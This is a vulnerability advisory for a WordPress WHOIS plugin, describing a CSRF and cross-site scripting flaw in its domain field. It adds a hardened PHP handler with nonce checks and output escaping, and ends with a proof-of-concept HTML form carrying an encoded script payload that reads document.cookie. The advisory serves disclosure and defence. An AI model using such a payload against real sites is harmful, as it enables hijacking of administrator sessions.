Due to a lack of CSRF mitigation and entity encoding in pages/func-whois.php, it is possible to execute scripts in the context of an admin user by including a script in the domain field, via the query string or a POST field.
There is currently no official fix; the plugin has been removed from the WordPress plugin repository until the vendor provides a solution.
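The two gaps named above (no CSRF token, no output encoding) can be closed as in the following sketch. It is an added example, not the vendor's fix and not code from the plugin; the function names, nonce action and form layout are assumptions, and it is meant to run inside a WordPress admin page.

```php
<?php
// Added example: hypothetical hardened handler for a WHOIS lookup form.
// The plugin's real pages/func-whois.php is not shown on the page, so all
// names below are illustrative.

const WHOIS_NONCE_ACTION = 'whois_lookup';  // hypothetical nonce action
const WHOIS_NONCE_FIELD  = '_whois_nonce';  // hypothetical nonce field name

/**
 * Return the validated domain from the request, or '' if there is none.
 * Only POST is accepted, so a domain passed in the query string is ignored.
 */
function whois_read_domain() {
    if ( 'POST' !== ( $_SERVER['REQUEST_METHOD'] ?? '' ) || ! isset( $_POST['domain'] ) ) {
        return '';
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html( 'Insufficient permissions.' ), '', array( 'response' => 403 ) );
    }
    // CSRF mitigation: dies unless the nonce issued by whois_render_form() is valid.
    check_admin_referer( WHOIS_NONCE_ACTION, WHOIS_NONCE_FIELD );

    $domain = sanitize_text_field( wp_unslash( $_POST['domain'] ) );
    // Accept only syntactically valid hostnames; markup is rejected here.
    $valid = filter_var( $domain, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME );
    return false === $valid ? '' : $valid;
}

/** Render the form; every echo of the domain goes through an escaping call. */
function whois_render_form() {
    $domain = whois_read_domain();
    ?>
    <form method="post">
        <?php wp_nonce_field( WHOIS_NONCE_ACTION, WHOIS_NONCE_FIELD ); ?>
        <input type="text" name="domain" value="<?php echo esc_attr( $domain ); ?>">
        <input type="submit" value="Lookup">
    </form>
    <?php
    if ( '' !== $domain ) {
        // Entity-encode again at the point of output, even after validation.
        printf( '<p>%s</p>', esc_html( sprintf( 'WHOIS result for %s', $domain ) ) );
    }
}
```

Validation on input and escaping on output are both kept: the hostname check narrows what the lookup receives, while `esc_attr()` and `esc_html()` protect the page even if the validation rule is later loosened.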
WordPress Exploit Framework Module
Proof of Concept
<form action="[url of page with the whois form]" method="post">
  <input type="hidden" name="domain" value="&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;">
  <input type="submit" value="Submit">
</form>